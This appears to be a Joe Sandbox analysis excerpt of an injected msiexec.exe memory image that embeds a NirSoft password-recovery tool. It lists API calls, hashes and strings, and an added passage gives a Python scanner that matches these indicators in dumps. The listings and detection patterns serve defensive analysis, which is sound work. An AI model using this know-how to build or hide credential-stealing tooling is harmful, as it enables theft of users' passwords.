                                                                                                        • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                        • API String ID: 667068680-3953557276
                                                                                                        • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                        • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                        • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                        • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                        APIs
                                                                                                        • GetDC.USER32(00000000), ref: 004121FF
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                        • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                        • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                        • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                        • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                          • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                          • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                          • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                        • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                        • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                        • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                        • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 1700100422-0
                                                                                                        • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                        • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                        • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                        • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                        APIs
                                                                                                        • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                        • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                        • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                        • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                        • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                        • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                        • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                        • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                        • String ID:
                                                                                                        • API String ID: 552707033-0
                                                                                                        • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                        • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                        • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                        • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$_snwprintf
                                                                                                        • String ID: %%0.%df
                                                                                                        • API String ID: 3473751417-763548558
                                                                                                        • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                        • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                        • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                        • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                        APIs
                                                                                                        • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                        • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                        • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                        • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                        • GetParent.USER32(?), ref: 00406136
                                                                                                        • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                        • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                        • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                        • String ID: A
                                                                                                        • API String ID: 2892645895-3554254475
                                                                                                        • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                        • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                        • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                        • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                        APIs
                                                                                                        • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                          • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                          • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                          • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                          • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                        • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                        • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                        • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                        • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                        • memset.MSVCRT ref: 0040DA23
                                                                                                        • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                        • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                        • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                          • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                        • String ID: caption
                                                                                                        • API String ID: 973020956-4135340389
                                                                                                        • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                        • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                        • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                        • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                        • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                        • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                        • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$_snwprintf$wcscpy
                                                                                                        • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                        • API String ID: 1283228442-2366825230
                                                                                                        • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                        • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                        • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                        • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
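The two GetProcAddress blocks above (psapi.dll process/module enumeration resolved at 004138ED-00413931, Toolhelp32 snapshot functions resolved at 00413865-004138A9) and the NirSoft HTML report template (xrefs 00410A70-00410B3C) are the strings a practitioner would pivot on when checking other dumps of the injected msiexec.exe image for the same embedded password-recovery tool. The scanner below is an added example, not part of the Joe Sandbox report or of the sample; the indicator strings are copied from the report's String ID fields, while the function names, the coverage threshold and the constructed sample dump are assumptions for illustration. It searches both ASCII and UTF-16LE because GetProcAddress names are ANSI in the image while LoadLibraryW and _snwprintf arguments are wide.

```python
"""Added example: group indicator strings from the report into families and
score a raw memory dump by how much of each family it contains.

Assumptions (ours, not the report's): function names, the 0.6 coverage
threshold, and the constructed dump built by build_constructed_dump().
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Indicator strings copied from the report's "String ID" fields, grouped by
# the function that references them.
INDICATOR_FAMILIES = {
    # GetProcAddress targets resolved from psapi.dll (ref 004138ED-00413931)
    "psapi_dynamic_resolution": [
        "psapi.dll", "EnumProcesses", "EnumProcessModules",
        "GetModuleBaseNameW", "GetModuleFileNameExW", "GetModuleInformation",
    ],
    # GetProcAddress targets resolved from kernel32.dll (ref 00413865-004138A9)
    "toolhelp_dynamic_resolution": [
        "CreateToolhelp32Snapshot", "Process32First", "Process32Next",
        "Module32First", "Module32Next",
    ],
    # HTML report template of the embedded NirSoft tool (xrefs 00410A70-00410B3C)
    "nirsoft_html_report": [
        '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">',
        'target="newwin">%s</a></h4><p>',
        "http://www.nirsoft.net/",
        '<table dir="rtl"><tr><td>',
    ],
}


@dataclass
class Hit:
    family: str
    needle: str
    encoding: str  # "ascii" or "utf-16-le"
    offset: int


def find_indicators(dump: bytes) -> list[Hit]:
    """Every occurrence of every indicator, in either encoding, by offset."""
    hits: list[Hit] = []
    for family, needles in INDICATOR_FAMILIES.items():
        for needle in needles:
            for enc in ("ascii", "utf-16-le"):
                pattern = re.escape(needle.encode(enc))
                for m in re.finditer(pattern, dump):
                    hits.append(Hit(family, needle, enc, m.start()))
    return sorted(hits, key=lambda h: h.offset)


def family_coverage(hits: list[Hit]) -> dict[str, float]:
    """Fraction of each family's needles seen at least once."""
    seen: dict[str, set[str]] = {}
    for h in hits:
        seen.setdefault(h.family, set()).add(h.needle)
    return {fam: len(seen.get(fam, ())) / len(needles)
            for fam, needles in INDICATOR_FAMILIES.items()}


def classify(dump: bytes, threshold: float = 0.6) -> list[str]:
    """Families whose coverage reaches the (assumed) threshold.

    One API name alone is common in benign code; most of a family sitting
    together in one image is the pattern the report shows, so we require
    a majority of each family rather than any single string.
    """
    cov = family_coverage(find_indicators(dump))
    return sorted(f for f, c in cov.items() if c >= threshold)


def build_constructed_dump() -> bytes:
    """Constructed sample, not a real dump: ANSI GetProcAddress names and
    UTF-16LE library/template strings separated by zero filler."""
    filler = b"\x00" * 16
    parts = [b"MZ" + b"\x90" * 62]
    for name in ("EnumProcessModules", "EnumProcesses", "GetModuleBaseNameW",
                 "GetModuleFileNameExW", "GetModuleInformation"):
        parts.append(name.encode("ascii") + b"\x00" + filler)
    parts.append("psapi.dll".encode("utf-16-le") + b"\x00\x00" + filler)
    for name in ("CreateToolhelp32Snapshot", "Process32First", "Process32Next"):
        parts.append(name.encode("ascii") + b"\x00" + filler)
    parts.append('<table dir="rtl"><tr><td>'.encode("utf-16-le") + filler)
    return b"".join(parts)


if __name__ == "__main__":
    dump = build_constructed_dump()
    for h in find_indicators(dump):
        print(f"{h.offset:08x} {h.family:28s} {h.encoding:9s} {h.needle}")
    print("families:", classify(dump))
```

Run against a real dump (for example the 0x400000 region of process 14 from this report) by replacing build_constructed_dump() with the file contents; the offsets printed can then be compared with the xrefs listed above to confirm the same image layout.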
                                                                                                        APIs
                                                                                                        • wcschr.MSVCRT ref: 00413972
                                                                                                        • wcscpy.MSVCRT ref: 00413982
                                                                                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                          • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                        • wcscpy.MSVCRT ref: 004139D1
                                                                                                        • wcscat.MSVCRT ref: 004139DC
                                                                                                        • memset.MSVCRT ref: 004139B8
                                                                                                          • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                          • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                        • memset.MSVCRT ref: 00413A00
                                                                                                        • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                        • wcscat.MSVCRT ref: 00413A27
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                        • String ID: \systemroot
                                                                                                        • API String ID: 4173585201-1821301763
                                                                                                        • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                        • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                        • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                        • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: wcscpy
                                                                                                        • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                        • API String ID: 1284135714-318151290
                                                                                                        • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                        • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                        • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                        • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                          • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                          • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                        • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                        • strchr.MSVCRT ref: 0040C140
                                                                                                        • strchr.MSVCRT ref: 0040C151
                                                                                                        • _strlwr.MSVCRT ref: 0040C15F
                                                                                                        • memset.MSVCRT ref: 0040C17A
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                                        • String ID: 4$h
                                                                                                        • API String ID: 4019544885-1856150674
                                                                                                        • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                        • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                        • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                        • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                        • String ID: 0$6
                                                                                                        • API String ID: 4066108131-3849865405
                                                                                                        • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                        • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                        • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                        • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004082EF
                                                                                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                        • memset.MSVCRT ref: 00408362
                                                                                                        • memset.MSVCRT ref: 00408377
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$ByteCharMultiWide
                                                                                                        • String ID:
                                                                                                        • API String ID: 290601579-0
                                                                                                        • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                        • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                        • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                        • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                        APIs
                                                                                                        • memchr.MSVCRT ref: 00444EBF
                                                                                                        • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                        • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                        • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                        • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                        • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                        • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                        • memset.MSVCRT ref: 0044505E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memchrmemset
                                                                                                        • String ID: PD$PD
                                                                                                        • API String ID: 1581201632-2312785699
                                                                                                        • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                        • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                        • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                        • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                        APIs
                                                                                                        • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                        • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                        • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                        • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                        • GetParent.USER32(?), ref: 00409FA5
                                                                                                        • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 2163313125-0
                                                                                                        • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                        • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                        • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                        • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$wcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3592753638-3916222277
                                                                                                        • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                        • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                        • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                        • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040A47B
                                                                                                        • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                        • wcslen.MSVCRT ref: 0040A4BA
                                                                                                        • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                        • wcslen.MSVCRT ref: 0040A4E0
                                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpywcslen$_snwprintfmemset
                                                                                                        • String ID: %s (%s)$YV@
                                                                                                        • API String ID: 3979103747-598926743
                                                                                                        • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                        • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                        • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                        • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                        APIs
                                                                                                        • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                        • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                        • wcslen.MSVCRT ref: 0040A6B1
                                                                                                        • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                        • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                        • String ID: Unknown Error$netmsg.dll
                                                                                                        • API String ID: 2767993716-572158859
